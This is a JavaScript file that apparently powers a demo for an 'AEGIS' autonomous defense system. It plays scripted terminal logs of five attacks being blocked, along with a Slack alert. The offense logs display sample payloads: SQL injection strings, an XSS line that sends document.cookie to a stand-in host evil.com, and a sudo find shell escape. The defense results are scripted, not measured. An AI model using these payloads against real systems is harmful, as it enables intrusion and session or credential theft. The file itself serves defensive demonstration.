// Attack Scenarios - Randomly selected each demo
const SCENARIOS = [
    // Scenario 1: SQL Injection
    {
        title: 'SQL Injection Attack',
        offense: [
            { text: '$ ./offensive_agent.py --target webapp --mode sql_injection', class: 'prompt' },
            { text: '', class: '' },
            { text: '[*] Initializing offensive AI agent...', class: 'info' },
            { text: '[*] Target: webapp.aegis.local', class: 'info' },
            { text: '[*] Attack Vector: SQL Injection', class: 'info' },
            { text: '', class: '' },
            { text: '[+] Scanning for injection points...', class: 'warning' },
            { text: '[+] Found: /api/users/login', class: 'warning' },
            { text: '[+] Found: /api/search', class: 'warning' },
            { text: '', class: '' },
            { text: '[!] Attempting SQL injection on /api/users/login', class: 'attack' },
            { text: '    Payload: admin\' OR \'1\'=\'1', class: 'dim' },
            { text: '    Response: 200 OK', class: 'attack' },
            { text: '', class: '' },
            { text: '[!] Attempting database enumeration...', class: 'attack' },
            { text: '    SELECT * FROM users WHERE id=1 UNION SELECT schema_name...', class: 'dim' },
            { text: '', class: '' },
            { text: '[!] Attempting data exfiltration...', class: 'attack' },
            { text: '    Query: SELECT username,password FROM users--', class: 'dim' },
            { text: '', class: '' },
            { text: '[X] Connection terminated by remote host', class: 'error' },
            { text: '[X] Attack blocked at 4.2 seconds', class: 'error' },
            { text: '[X] Session killed - AEGIS defense activated', class: 'error' }
        ],
        defense: [
            { text: '🛡️  AEGIS Autonomous Defense System v2.0', class: 'success' },
            { text: '━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━', class: 'dim' },
            { text: '', class: '' },
            { text: '[MONITOR] Behavioral analysis engine: ACTIVE', class: 'info' },
            { text: '[MONITOR] Sentry telemetry: STREAMING', class: 'info' },
            { text: '[MONITOR] Claude AI analyzer: READY', class: 'info' },
            { text: '', class: '' },
            { text: '⚠️  [ALERT] Anomalous behavior detected!', class: 'warning' },
            { text: '    Source: 192.168.1.105', class: 'dim' },
            { text: '    Pattern: SQL Injection (95% confidence)', class: 'dim' },
            { text: '    Severity: CRITICAL', class: 'dim' },
            { text: '', class: '' },
            { text: '🔍 [ANALYZE] Behavioral scoring in progress...', class: 'info' },
            { text: '    ✓ Signature match: SQL injection pattern', class: 'success' },
            { text: '    ✓ Kill chain stage: Exploitation', class: 'success' },
            { text: '    ✓ Threat score: 8.7/10', class: 'success' },
            { text: '', class: '' },
            { text: '🚨 [RESPONSE] Autonomous killswitch ACTIVATED', class: 'attack' },
            { text: '    ⚡ Action 1: Session termination [0.3s]', class: 'warning' },
            { text: '    ⚡ Action 2: IP block added [0.8s]', class: 'warning' },
            { text: '    ⚡ Action 3: Database connection killed [1.2s]', class: 'warning' },
            { text: '    ⚡ Action 4: WAF rules updated [2.1s]', class: 'warning' },
            { text: '    ⚡ Action 5: Credential rotation initiated [3.4s]', class: 'warning' },
            { text: '', class: '' },
            { text: '🤖 [AI] Claude analyzing incident...', class: 'info' },
            { text: '    ✓ Attack timeline reconstructed', class: 'success' },
            { text: '    ✓ Impact assessment complete', class: 'success' },
            { text: '    ✓ Incident report generated', class: 'success' },
            { text: '', class: '' },
            { text: '✅ [COMPLETE] Threat neutralized in 4.2 seconds', class: 'success' },
            { text: '✅ [STATUS] Zero data loss - All systems secure', class: 'success' },
            { text: '✅ [NOTIFY] SOC alert sent via Slack', class: 'success' }
        ],
        slack: {
            attackType: 'SQL Injection',
            severity: 'CRITICAL',
            ip: '192.168.1.105',
            confidence: '95%',
            responseTime: '4.2s'
        }
    },

    // Scenario 2: Ransomware Attack
    {
        title: 'Ransomware Attack',
        offense: [
            { text: '$ ./offensive_agent.py --target fileserver --mode ransomware', class: 'prompt' },
            { text: '', class: '' },
            { text: '[*] Initializing ransomware deployment...', class: 'info' },
            { text: '[*] Target: fileserver.aegis.local', class: 'info' },
            { text: '[*] Attack Vector: RansomHub Variant', class: 'info' },
            { text: '', class: '' },
            { text: '[+] Establishing persistence...', class: 'warning' },
            { text: '[+] Disabling antivirus... SUCCESS', class: 'warning' },
            { text: '[+] Escalating privileges... SUCCESS', class: 'warning' },
            { text: '', class: '' },
            { text: '[!] Scanning for valuable files...', class: 'attack' },
            { text: '    Found: /data/customer_records/', class: 'dim' },
            { text: '    Found: /backup/financial/', class: 'dim' },
            { text: '    Found: /documents/contracts/', class: 'dim' },
            { text: '', class: '' },
            { text: '[!] Initiating encryption process...', class: 'attack' },
            { text: '    Encrypting: customer_records... 12% ', class: 'dim' },
            { text: '', class: '' },
            { text: '[X] Process terminated - Access denied', class: 'error' },
            { text: '[X] Attack blocked at 3.8 seconds', class: 'error' },
            { text: '[X] All processes killed - AEGIS defense activated', class: 'error' }
        ],
        defense: [
            { text: '🛡️  AEGIS Autonomous Defense System v2.0', class: 'success' },
            { text: '━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━', class: 'dim' },
            { text: '', class: '' },
            { text: '[MONITOR] File integrity monitoring: ACTIVE', class: 'info' },
            { text: '[MONITOR] Sentry telemetry: STREAMING', class: 'info' },
            { text: '[MONITOR] Claude AI analyzer: READY', class: 'info' },
            { text: '', class: '' },
            { text: '⚠️  [ALERT] Ransomware behavior detected!', class: 'warning' },
            { text: '    Source: fileserver.aegis.local', class: 'dim' },
            { text: '    Pattern: RansomHub signature (98% confidence)', class: 'dim' },
            { text: '    Severity: CRITICAL', class: 'dim' },
            { text: '', class: '' },
            { text: '🔍 [ANALYZE] Behavioral scoring in progress...', class: 'info' },
            { text: '    ✓ Signature match: RansomHub malware family', class: 'success' },
            { text: '    ✓ Kill chain stage: Actions on Objective', class: 'success' },
            { text: '    ✓ Threat score: 9.8/10', class: 'success' },
            { text: '', class: '' },
            { text: '🚨 [RESPONSE] Autonomous killswitch ACTIVATED', class: 'attack' },
            { text: '    ⚡ Action 1: All processes terminated [0.2s]', class: 'warning' },
            { text: '    ⚡ Action 2: File encryption blocked [0.5s]', class: 'warning' },
            { text: '    ⚡ Action 3: Network isolation enabled [1.1s]', class: 'warning' },
            { text: '    ⚡ Action 4: Backup systems secured [2.3s]', class: 'warning' },
            { text: '    ⚡ Action 5: Forensic snapshot captured [3.1s]', class: 'warning' },
            { text: '', class: '' },
            { text: '🤖 [AI] Claude analyzing incident...', class: 'info' },
            { text: '    ✓ Malware family identified', class: 'success' },
            { text: '    ✓ Zero files encrypted', class: 'success' },
            { text: '    ✓ Incident report generated', class: 'success' },
            { text: '', class: '' },
            { text: '✅ [COMPLETE] Threat neutralized in 3.8 seconds', class: 'success' },
            { text: '✅ [STATUS] Zero data loss - All files protected', class: 'success' },
            { text: '✅ [NOTIFY] SOC alert sent via Slack', class: 'success' }
        ],
        slack: {
            attackType: 'Ransomware (RansomHub)',
            severity: 'CRITICAL',
            ip: 'fileserver.aegis.local',
            confidence: '98%',
            responseTime: '3.8s'
        }
    },

    // Scenario 3: XSS Attack
    {
        title: 'XSS (Cross-Site Scripting) Attack',
        offense: [
            { text: '$ ./offensive_agent.py --target webapp --mode xss', class: 'prompt' },
            { text: '', class: '' },
            { text: '[*] Initializing XSS attack vector...', class: 'info' },
            { text: '[*] Target: webapp.aegis.local/search', class: 'info' },
            { text: '[*] Attack Vector: Reflected XSS', class: 'info' },
            { text: '', class: '' },
            { text: '[+] Scanning for injection points...', class: 'warning' },
            { text: '[+] Found: Search parameter (unsanitized)', class: 'warning' },
            { text: '[+] Found: Comment field (vulnerable)', class: 'warning' },
            { text: '', class: '' },
            { text: '[!] Injecting malicious payload...', class: 'attack' },
            { text: '    Payload: <script>document.location=evil.com</script>', class: 'dim' },
            { text: '    Attempting session hijacking...', class: 'dim' },
            { text: '', class: '' },
            { text: '[!] Attempting cookie theft...', class: 'attack' },
            { text: '    Script: fetch("evil.com?c="+document.cookie)', class: 'dim' },
            { text: '', class: '' },
            { text: '[X] Request blocked by WAF', class: 'error' },
            { text: '[X] Attack blocked at 2.9 seconds', class: 'error' },
            { text: '[X] Connection terminated - AEGIS defense activated', class: 'error' }
        ],
        defense: [
            { text: '🛡️  AEGIS Autonomous Defense System v2.0', class: 'success' },
            { text: '━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━', class: 'dim' },
            { text: '', class: '' },
            { text: '[MONITOR] Web application firewall: ACTIVE', class: 'info' },
            { text: '[MONITOR] Sentry telemetry: STREAMING', class: 'info' },
            { text: '[MONITOR] Claude AI analyzer: READY', class: 'info' },
            { text: '', class: '' },
            { text: '⚠️  [ALERT] XSS attack detected!', class: 'warning' },
            { text: '    Source: 203.0.113.42', class: 'dim' },
            { text: '    Pattern: Reflected XSS (92% confidence)', class: 'dim' },
            { text: '    Severity: HIGH', class: 'dim' },
            { text: '', class: '' },
            { text: '🔍 [ANALYZE] Behavioral scoring in progress...', class: 'info' },
            { text: '    ✓ Malicious script detected in request', class: 'success' },
            { text: '    ✓ Kill chain stage: Exploitation', class: 'success' },
            { text: '    ✓ Threat score: 7.5/10', class: 'success' },
            { text: '', class: '' },
            { text: '🚨 [RESPONSE] Autonomous killswitch ACTIVATED', class: 'attack' },
            { text: '    ⚡ Action 1: Request blocked by WAF [0.1s]', class: 'warning' },
            { text: '    ⚡ Action 2: IP address blacklisted [0.6s]', class: 'warning' },
            { text: '    ⚡ Action 3: Input validation updated [1.3s]', class: 'warning' },
            { text: '    ⚡ Action 4: CSP headers strengthened [2.1s]', class: 'warning' },
            { text: '    ⚡ Action 5: Session tokens rotated [2.7s]', class: 'warning' },
            { text: '', class: '' },
            { text: '🤖 [AI] Claude analyzing incident...', class: 'info' },
            { text: '    ✓ Payload deobfuscated and analyzed', class: 'success' },
            { text: '    ✓ No user data compromised', class: 'success' },
            { text: '    ✓ Incident report generated', class: 'success' },
            { text: '', class: '' },
            { text: '✅ [COMPLETE] Threat neutralized in 2.9 seconds', class: 'success' },
            { text: '✅ [STATUS] Zero data loss - Users protected', class: 'success' },
            { text: '✅ [NOTIFY] SOC alert sent via Slack', class: 'success' }
        ],
        slack: {
            attackType: 'XSS (Cross-Site Scripting)',
            severity: 'HIGH',
            ip: '203.0.113.42',
            confidence: '92%',
            responseTime: '2.9s'
        }
    },

    // Scenario 4: Brute Force Attack
    {
        title: 'Brute Force Attack',
        offense: [
            { text: '$ ./offensive_agent.py --target ssh --mode brute_force', class: 'prompt' },
            { text: '', class: '' },
            { text: '[*] Initializing brute force attack...', class: 'info' },
            { text: '[*] Target: ssh.aegis.local:22', class: 'info' },
            { text: '[*] Attack Vector: SSH Credential Brute Force', class: 'info' },
            { text: '', class: '' },
            { text: '[+] Loading wordlist: rockyou.txt (14M passwords)', class: 'warning' },
            { text: '[+] Threads: 50', class: 'warning' },
            { text: '[+] Rate: 1000 attempts/second', class: 'warning' },
            { text: '', class: '' },
            { text: '[!] Attempting authentication...', class: 'attack' },
            { text: '    Trying: admin/password123 ... FAILED', class: 'dim' },
            { text: '    Trying: admin/admin ... FAILED', class: 'dim' },
            { text: '    Trying: admin/letmein ... FAILED', class: 'dim' },
            { text: '    Trying: admin/123456 ... FAILED', class: 'dim' },
            { text: '    Trying: admin/qwerty ... FAILED', class: 'dim' },
            { text: '', class: '' },
            { text: '[!] Attempts: 5247/14,000,000', class: 'attack' },
            { text: '', class: '' },
            { text: '[X] Connection blocked - Rate limit exceeded', class: 'error' },
            { text: '[X] Attack blocked at 5.1 seconds', class: 'error' },
            { text: '[X] IP banned - AEGIS defense activated', class: 'error' }
        ],
        defense: [
            { text: '🛡️  AEGIS Autonomous Defense System v2.0', class: 'success' },
            { text: '━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━', class: 'dim' },
            { text: '', class: '' },
            { text: '[MONITOR] Authentication monitoring: ACTIVE', class: 'info' },
            { text: '[MONITOR] Sentry telemetry: STREAMING', class: 'info' },
            { text: '[MONITOR] Claude AI analyzer: READY', class: 'info' },
            { text: '', class: '' },
            { text: '⚠️  [ALERT] Brute force attack detected!', class: 'warning' },
            { text: '    Source: 198.51.100.88', class: 'dim' },
            { text: '    Pattern: SSH brute force (99% confidence)', class: 'dim' },
            { text: '    Severity: HIGH', class: 'dim' },
            { text: '', class: '' },
            { text: '🔍 [ANALYZE] Behavioral scoring in progress...', class: 'info' },
            { text: '    ✓ 5247 failed login attempts detected', class: 'success' },
            { text: '    ✓ Kill chain stage: Initial Access', class: 'success' },
            { text: '    ✓ Threat score: 8.9/10', class: 'success' },
            { text: '', class: '' },
            { text: '🚨 [RESPONSE] Autonomous killswitch ACTIVATED', class: 'attack' },
            { text: '    ⚡ Action 1: IP banned globally [0.4s]', class: 'warning' },
            { text: '    ⚡ Action 2: Rate limiting applied [1.2s]', class: 'warning' },
            { text: '    ⚡ Action 3: MFA enforced on all accounts [2.5s]', class: 'warning' },
            { text: '    ⚡ Action 4: SSH keys rotated [3.8s]', class: 'warning' },
            { text: '    ⚡ Action 5: Fail2ban rules updated [4.9s]', class: 'warning' },
            { text: '', class: '' },
            { text: '🤖 [AI] Claude analyzing incident...', class: 'info' },
            { text: '    ✓ Attack pattern identified', class: 'success' },
            { text: '    ✓ No accounts compromised', class: 'success' },
            { text: '    ✓ Incident report generated', class: 'success' },
            { text: '', class: '' },
            { text: '✅ [COMPLETE] Threat neutralized in 5.1 seconds', class: 'success' },
            { text: '✅ [STATUS] Zero data loss - All accounts secure', class: 'success' },
            { text: '✅ [NOTIFY] SOC alert sent via Slack', class: 'success' }
        ],
        slack: {
            attackType: 'Brute Force (SSH)',
            severity: 'HIGH',
            ip: '198.51.100.88',
            confidence: '99%',
            responseTime: '5.1s'
        }
    },

    // Scenario 5: Privilege Escalation
    {
        title: 'Privilege Escalation Attack',
        offense: [
            { text: '$ ./offensive_agent.py --target system --mode privesc', class: 'prompt' },
            { text: '', class: '' },
            { text: '[*] Initializing privilege escalation...', class: 'info' },
            { text: '[*] Target: webapp-server-01', class: 'info' },
            { text: '[*] Attack Vector: Sudo Exploit (CVE-2023-XXXX)', class: 'info' },
            { text: '', class: '' },
            { text: '[+] Current user: www-data (UID 33)', class: 'warning' },
            { text: '[+] Target: root (UID 0)', class: 'warning' },
            { text: '[+] Scanning for vulnerable binaries...', class: 'warning' },
            { text: '', class: '' },
            { text: '[!] Exploiting sudo misconfiguration...', class: 'attack' },
            { text: '    sudo -l ... Found: (ALL) NOPASSWD: /usr/bin/find', class: 'dim' },
            { text: '    Executing: find . -exec /bin/sh -p \\;', class: 'dim' },
            { text: '', class: '' },
            { text: '[!] Attempting to spawn root shell...', class: 'attack' },
            { text: '    Command: sudo find / -name aegis -exec sh \\;', class: 'dim' },
            { text: '', class: '' },
            { text: '[X] Access denied - Security policy enforced', class: 'error' },
            { text: '[X] Attack blocked at 4.5 seconds', class: 'error' },
            { text: '[X] Account locked - AEGIS defense activated', class: 'error' }
        ],
        defense: [
            { text: '🛡️  AEGIS Autonomous Defense System v2.0', class: 'success' },
            { text: '━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━', class: 'dim' },
            { text: '', class: '' },
            { text: '[MONITOR] System integrity monitoring: ACTIVE', class: 'info' },
            { text: '[MONITOR] Sentry telemetry: STREAMING', class: 'info' },
            { text: '[MONITOR] Claude AI analyzer: READY', class: 'info' },
            { text: '', class: '' },
            { text: '⚠️  [ALERT] Privilege escalation attempt!', class: 'warning' },
            { text: '    Source: www-data@webapp-server-01', class: 'dim' },
            { text: '    Pattern: Sudo exploit (94% confidence)', class: 'dim' },
            { text: '    Severity: CRITICAL', class: 'dim' },
            { text: '', class: '' },
            { text: '🔍 [ANALYZE] Behavioral scoring in progress...', class: 'info' },
            { text: '    ✓ Unusual sudo usage detected', class: 'success' },
            { text: '    ✓ Kill chain stage: Privilege Escalation', class: 'success' },
            { text: '    ✓ Threat score: 9.1/10', class: 'success' },
            { text: '', class: '' },
            { text: '🚨 [RESPONSE] Autonomous killswitch ACTIVATED', class: 'attack' },
            { text: '    ⚡ Action 1: User session terminated [0.3s]', class: 'warning' },
            { text: '    ⚡ Action 2: Account locked immediately [0.7s]', class: 'warning' },
            { text: '    ⚡ Action 3: Sudo config audited [1.9s]', class: 'warning' },
            { text: '    ⚡ Action 4: SELinux policies enforced [3.2s]', class: 'warning' },
            { text: '    ⚡ Action 5: All elevated sessions killed [4.1s]', class: 'warning' },
            { text: '', class: '' },
            { text: '🤖 [AI] Claude analyzing incident...', class: 'info' },
            { text: '    ✓ Exploit technique identified', class: 'success' },
            { text: '    ✓ No privilege escalation occurred', class: 'success' },
            { text: '    ✓ Incident report generated', class: 'success' },
            { text: '', class: '' },
            { text: '✅ [COMPLETE] Threat neutralized in 4.5 seconds', class: 'success' },
            { text: '✅ [STATUS] Zero data loss - Root access denied', class: 'success' },
            { text: '✅ [NOTIFY] SOC alert sent via Slack', class: 'success' }
        ],
        slack: {
            attackType: 'Privilege Escalation',
            severity: 'CRITICAL',
            ip: 'webapp-server-01 (internal)',
            confidence: '94%',
            responseTime: '4.5s'
        }
    }
];

// Generate Slack log based on scenario
function generateSlackLog(scenario) {
    return [
        { text: '📡 Slack Webhook Integration', class: 'info' },
        { text: '━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━', class: 'dim' },
        { text: '', class: '' },
        { text: '[*] Connecting to Slack API...', class: 'info' },
        { text: '[*] Channel: #security-alerts', class: 'info' },
        { text: '', class: '' },
        { text: '📤 Sending SOC notification...', class: 'warning' },
        { text: '', class: '' },
        { text: '┌─────────────────────────────────────────┐', class: 'dim' },
        { text: '│ 🚨 ' + scenario.severity + ' SECURITY INCIDENT' + ' '.repeat(Math.max(0, 29 - scenario.severity.length)) + '│', class: 'attack' },
        { text: '├─────────────────────────────────────────┤', class: 'dim' },
        { text: '│                                         │', class: '' },
        { text: '│ Attack Type: ' + scenario.attackType + ' '.repeat(Math.max(0, 28 - scenario.attackType.length)) + '│', class: '' },
        { text: '│ Severity: ' + scenario.severity + ' '.repeat(Math.max(0, 31 - scenario.severity.length)) + '│', class: '' },
        { text: '│ Source: ' + scenario.ip + ' '.repeat(Math.max(0, 32 - scenario.ip.length)) + '│', class: '' },
        { text: '│ Confidence: ' + scenario.confidence + ' '.repeat(Math.max(0, 28 - scenario.confidence.length)) + '│', class: '' },
        { text: '│                                         │', class: '' },
        { text: '│ Timeline:                               │', class: '' },
        { text: '│  → 00:00.0s: Attack detected            │', class: 'dim' },
        { text: '│  → 00:00.3s: Response initiated         │', class: 'dim' },
        { text: '│  → 00:0' + scenario.responseTime + ': Threat neutralized     │', class: 'dim' },
        { text: '│                                         │', class: '' },
        { text: '│ Actions Taken:                          │', class: '' },
        { text: '│  ✓ Session killed                       │', class: 'success' },
        { text: '│  ✓ IP/account blocked                   │', class: 'success' },
        { text: '│  ✓ Systems secured                      │', class: 'success' },
        { text: '│  ✓ Security policies updated            │', class: 'success' },
        { text: '│  ✓ Credentials rotated                  │', class: 'success' },
        { text: '│                                         │', class: '' },
        { text: '│ Impact: ZERO DATA LOSS                  │', class: 'success' },
        { text: '│ Status: All systems secure              │', class: 'success' },
        { text: '│                                         │', class: '' },
        { text: '└─────────────────────────────────────────┘', class: 'dim' },
        { text: '', class: '' },
        { text: '✅ Message delivered successfully', class: 'success' },
        { text: '✅ SOC team notified in real-time', class: 'success' },
        { text: '', class: '' },
        { text: '[*] Response ID: msg_' + Math.random().toString(36).substr(2, 12), class: 'dim' },
        { text: '[*] Timestamp: ' + new Date().toISOString().replace('T', ' ').substr(0, 19) + ' UTC', class: 'dim' }
    ];
}
